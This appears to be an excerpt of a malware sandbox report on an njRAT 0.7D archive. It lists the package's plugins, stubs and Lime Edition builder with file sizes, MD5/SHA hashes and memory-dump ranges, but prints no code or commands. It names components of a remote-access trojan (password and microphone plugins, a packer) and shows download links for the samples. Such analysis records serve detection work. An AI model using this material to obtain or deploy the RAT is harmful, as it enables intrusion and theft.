C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Golden Edition\plugin\mic.dll

Filesize
48KB

MD5
1607999c56366fc2096a27a8bd237b98

SHA1
0e0a61c55c6a7e8fecaa2053afeaf816095374a2

SHA256
7d327985d7e4f83adffbdf831c1e999c68cb90238790b63260af19d24bfa66b8

SHA512
d30a642f26307f16a88782de2635b6e7b852dcbc90975c3920d61468dde06ed921074d95bd9d3b3b058ce4ce54973254370830d68f94a0d56b5072e82b890b85

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Golden Edition\plugin\plg.dll

Filesize
28KB

MD5
04cb30a874ee349721b0398594de65fe

SHA1
8f3272e318edd73c1f4194f3a90143e18f158e10

SHA256
6f8770a35ec0845226a28dd57c8ae414dc8814a6871bd0bb818bb13ca3b82106

SHA512
a69b3bc0e30ddaae10478626ac231b214864b722c9254d932a81ea1016f4f49cf04551d17cbe93819f9e1bd88f679fdc1f5446761c7065e2b0d30a8b7edf40ae

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Golden Edition\plugin\pw.dll

Filesize
251KB

MD5
872401528fc94c90f3de6658e776cc36

SHA1
c58e22158774d16831350de79eb4e1711379e8a6

SHA256
3a1cc072effd8c38406a6fddf4d8f49c5366bb0e32071311d90db669940987ce

SHA512
6da881fb968ba9d9200777a9f19d69220468482f3eaaf687c433790d512da520f5adb23441fdc8f3fd10785918eb2864ea3ef32ddb80d2f6665550ea455f4a2f

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Golden Edition\plugin\sc2.dll

Filesize
12KB

MD5
9c8b5c9ec7d24ef02c7df4e589dba366

SHA1
6f939463f40343cf62afc072978c833ee864914f

SHA256
f97aadb4d1c59f4b3155a9ec57f91a05700aed38b0090096f8f1e0e7975b6561

SHA512
a4bf281274c22b41b8faf0cbe7559c5a62bd7614bcc06cdc29f8f28419010bdadcb70a850886b4be9d7b6edb370fb34283a5f0991a1320edbaa12b5a194f8196

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Golden Edition\stubs\Mpress.egg

Filesize
5B

MD5
f8320b26d30ab433c5a54546d21f414c

SHA1
97cdbdc7feff827efb082a6b6dd2727237cd49fd

SHA256
60a33e6cf5151f2d52eddae9685cfa270426aa89d8dbc7dfb854606f1d1a40fe

SHA512
af1aace54ec0ab736f8a6a262cc319740beb89d04efe071d451522e2cdb210bf0c81ae676ebc45781935cc18a3b939a6645b2ebe0a484e2594d672d81460b3dd

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Golden Edition\stubs\mpress.exe

Filesize
101KB

MD5
8b632bfc3fe653a510cba277c2d699d1

SHA1
d6a57aa17e5eb51297def9bac04e574c1e36d9c7

SHA256
2852680c94a9d68cdab285012d9328a1ceca290db60c9e35155c2bb3e46a41b4

SHA512
b9ea70ed984d3b4a42eceb9f34f222b722c4c1985b79b368d769fe0fd1f19f037ffebe2cf938aa98ed450337836a7469d911848448d99223995f7fb3a9304587

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat.0.7D\WinMM.Net.dll

Filesize
43KB

MD5
d4b80052c7b4093e10ce1f40ce74f707

SHA1
2494a38f1c0d3a0aa9b31cf0650337cacc655697

SHA256
59e2ac1b79840274bdfcef412a10058654e42f4285d732d1487e65e60ffbfb46

SHA512
3813b81f741ae3adb07ae370e817597ed2803680841ccc7549babb727910c7bff4f8450670d0ca19a0d09e06f133a1aaefecf5b5620e1b0bdb6bcd409982c450

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\njRAT Lime Edition\Icons\icon (8).ico

Filesize
361KB

MD5
e6fec4185b607e01a938fa405e0a6c6c

SHA1
565e72809586e46700b74931e490e2dc1e7e3db1

SHA256
2e2f17b7dd15007192e7cbbd0019355f8be58068dc5042323123724b99ae4b44

SHA512
13daeb2bf124e573590359f18a1d962157dc635a88319c9ed1a2e8ccad6322fb081579e1e8fbe62ffe55c8286c2bc8acb251d572a4beb00641ad5009a380e513

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\njRAT Lime Edition\Mono.Cecil.dll

Filesize
305KB

MD5
851ec9d84343fbd089520d420348a902

SHA1
f8e2a80130058e4db3cf569cf4297d07d05c93e0

SHA256
cdadc26c09f869e21053ee1a0acf3b2d11df8edd599fe9c377bd4d3ce1c9cda9

SHA512
5e1d1b953fda4a905749eff8c4133a164748ba08c4854348539d335cf53c873eae7c653807a2701bf307693a049ae6c523bd1497a8e659bdea0a71085a58a5f1

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\njRAT Lime Edition\NjRat Lime Edition 0.8.0.exe

Filesize
9.5MB

MD5
482c73ca6c64073d877cf9c510b872ca

SHA1
0bf34784d312b98d38c107429e48489180484ebf

SHA256
1c617cfb5d8a252e015f9937af47d84f5557d7ebe25f2b2acfeb03671bf08ed9

SHA512
ca1a60df6e96b55071b6d48475bcddea430f84ded41705a796db6f3bc405a0aa41607fa4852d3e2f3e72c1bdd5f37b22e99134e6f3aec8a4b809b417dca2ee96

Download Submit
memory/848-792-0x0000000000BA0000-0x0000000001498000-memory.dmp

Filesize
9.0MB

Download
memory/2112-735-0x0000000074D30000-0x00000000752E1000-memory.dmp

Filesize
5.7MB

Download
memory/2112-752-0x0000000074D30000-0x00000000752E1000-memory.dmp

Filesize
5.7MB

Download
memory/2112-691-0x0000000074D30000-0x00000000752E1000-memory.dmp

Filesize
5.7MB

Download
memory/2112-734-0x0000000074D32000-0x0000000074D33000-memory.dmp

Filesize
4KB

Download
memory/2112-690-0x0000000074D30000-0x00000000752E1000-memory.dmp

Filesize
5.7MB

Download
memory/2112-689-0x0000000074D32000-0x0000000074D33000-memory.dmp

Filesize
4KB

Download
memory/2112-750-0x0000000074D30000-0x00000000752E1000-memory.dmp

Filesize
5.7MB

Download
memory/3292-816-0x00000000055F0000-0x0000000005B94000-memory.dmp

Filesize
5.6MB

Download
memory/3292-815-0x0000000000110000-0x000000000016E000-memory.dmp

Filesize
376KB

Download
memory/3292-817-0x00000000050E0000-0x0000000005172000-memory.dmp

Filesize
584KB

Download
memory/3292-818-0x0000000005180000-0x000000000521C000-memory.dmp

Filesize
624KB

Download
memory/3292-819-0x0000000005070000-0x000000000507A000-memory.dmp

Filesize
40KB

Download
memory/3292-820-0x0000000006F90000-0x0000000006FD2000-memory.dmp

Filesize
264KB

Download
memory/4068-755-0x000000001B7E0000-0x000000001B886000-memory.dmp

Filesize
664KB

Download
memory/4068-756-0x000000001BDB0000-0x000000001C27E000-memory.dmp

Filesize
4.8MB

Download
memory/4068-757-0x000000001C390000-0x000000001C42C000-memory.dmp

Filesize
624KB

Download
memory/4068-758-0x00000000011E0000-0x00000000011E8000-memory.dmp

Filesize
32KB

Download
memory/4068-761-0x000000001D3D0000-0x000000001D3E2000-memory.dmp

Filesize
72KB

Download
memory/4068-759-0x000000001C640000-0x000000001C68C000-memory.dmp

Filesize
304KB

Download